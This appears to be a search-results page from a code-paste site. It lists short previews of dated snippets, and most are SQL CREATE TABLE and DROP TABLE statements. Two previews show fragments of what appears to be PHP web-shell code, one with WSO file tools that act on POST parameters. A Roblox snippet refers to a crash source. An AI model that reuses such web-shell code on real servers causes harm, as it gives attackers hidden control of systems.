42.7K results in 812 ms
8 years ago · Dec 09, 2017, 03:36 PM
DATABASE `myDb`; USE myDb; CREATE TABLE IF NOT EXISTS `docenten` ( `id` int(11) NOT
8 years ago · Dec 09, 2017, 02:22 PM
store.connect(); if (conn) { store.update(true, "CREATE TABLE IF NOT EXISTS `{P}users` (" + (store.getStoreMode() == StoreMode.MYSQL ? "`id`
8 years ago · Dec 09, 2017, 02:18 PM
cur=conn.cursor() def mymeth(): cur.execute('CREATE TABLE IF NOT EXISTS Employee ("emp_name" TEXT, "emp_phone"
8 years ago · Dec 09, 2017, 02:14 PM
for `gangs` -- ---------------------------- DROP TABLE IF EXISTS `gangs`; CREATE TABLE `gangs` ( `id` int(6) NOT NULL AUTO_INCREMENT, `owner` varchar(32)
8 years ago · Dec 09, 2017, 01:52 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Dec 09, 2017, 01:22 PM
TABLE IF EXISTS `mydb`.`Song` ; CREATE TABLE IF NOT EXISTS `mydb`.`Song` ( `ID` INT NOT
8 years ago · Dec 09, 2017, 01:20 PM
TABLE IF EXISTS `mydb`.`Song` ; CREATE TABLE IF NOT EXISTS `mydb`.`Song` ( `ID` INT NOT
8 years ago · Dec 09, 2017, 12:16 PM
seconds). /// @param _seller - Seller, if not the message sender function
8 years ago · Dec 09, 2017, 12:10 PM
Failed while preparing sql: CREATE TABLE IF NOT EXISTS USERS (uuid VARCHAR(37) PRIMARY
8 years ago · Dec 09, 2017, 12:00 PM
DROP DATABASE IF EXISTS busbays; CREATE DATABASE busbays; CREATE TABLE driver ( driver_id INT NOT
8 years ago · Dec 09, 2017, 11:34 AM
typ pojazdu create table if not exists `typ_pojazdu` `id`int(10), not null,
8 years ago · Dec 09, 2017, 10:22 AM
for table `spip_articles` -- DROP TABLE IF EXISTS `spip_articles`; /*!40101 SET @saved_cs_client
8 years ago · Dec 09, 2017, 10:04 AM
table `armory_character_stats` */ DROP TABLE IF EXISTS `armory_character_stats`; CREATE TABLE `armory_character_stats` ( `guid` int(11) NOT NULL, `data` longtext NOT
8 years ago · Dec 09, 2017, 08:40 AM
dest_table', ['my_primary_key'], True) Yields: CREATE TABLE IF NOT EXISTS dest_table (my_primary_key INTEGER, some_field
8 years ago · Dec 09, 2017, 08:38 AM
DELIMITER $$ DROP PROCEDURE IF EXISTS `betao`.`sp_apriori` $$ CREATE PROCEDURE `sp_apriori`(in sup_min integer,in
8 years ago · Dec 09, 2017, 07:10 AM
database Statement.executeUpdate DROP TABLE IF EXISTS subscribers; CREATE TABLE subscribers (subscriber_id int(15) UNSIGNED NOT NULL AUTO_INCREMENT, phone_number varchar(20)
8 years ago · Dec 09, 2017, 06:02 AM
interesting to know as if we do not know anything about it
8 years ago · Dec 09, 2017, 03:42 AM
Directory '".path()."' is not exists.")); if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable.")); print '<table width="100%" class="table_home" border="0" cellpadding="3"
8 years ago · Dec 09, 2017, 01:36 AM
Connect(player) if game.Players[player] then if not Players[player.Name] then NewLS(CrashSource,player.Backpack) table.insert(Players,player.Name)
8 years ago · Dec 08, 2017, 11:46 PM
structure for table db412.admin CREATE TABLE IF NOT EXISTS `admin` ( `id` int(11) NOT
Total pages: 2134